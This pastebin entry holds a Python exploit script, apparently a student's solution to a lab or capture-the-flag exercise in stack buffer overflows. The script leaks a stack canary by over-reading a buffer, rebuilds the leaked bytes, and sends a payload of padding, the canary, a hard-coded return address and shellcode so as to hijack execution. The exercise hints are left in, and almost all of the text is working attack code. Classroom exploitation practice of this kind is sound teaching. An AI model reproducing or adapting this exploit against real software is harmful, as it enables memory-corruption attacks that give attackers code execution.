Untitled - PYTHON 1.20 KB
                                
                                    ### YOUR CODE STARTS HERE ###
# CANARY @ 0xbffff708
# Example send:
p.send('B' * 12 + "\\x" + '\n')
#full_canary = p.recvline()
full_canary = p.recv(17)
print(full_canary)
canary_stripped = full_canary[13:] # Remove 13th byte which is always '\\x\n\0'
print("Canary:", canary_stripped, len(canary_stripped))

# c.buffer at 0xbffff6f4 (ends at 0xbffff704)
# eip stored at 0xbffff710
rip = '\x14\xf7\xff\xbf' # 0xbffff714

## Format the fucking canary
sp = ":".join("{:02x}".format(ord(c)) for c in canary_stripped)
print(sp)

hex_can = canary_stripped.encode('hex')
print(hex_can)
hex_format = ''
for i in range(0,len(hex_can),2):
    hex_format += chr(int(hex_can[i:i+2],16))
##
dat_string ='\x00' + 'A' * 15 + hex_format + 'B' *4 + rip + SHELLCODE + '\n'
print (dat_string)
p.send(dat_string)
'''
# Example receive:
assert p.recvline() == 'testA'

# HINT: the last line of your exploit should look something like:
#   p.send('A' * m + canary + 'B' * n + rip + SHELLCODE + '\n')
# where m, canary, n and rip are all values you must determine
# and you might need to add a '\x00' somewhere
'''
### YOUR CODE  ENDS  HERE ###
                                
                            

Paste Hosted With By Paste.ly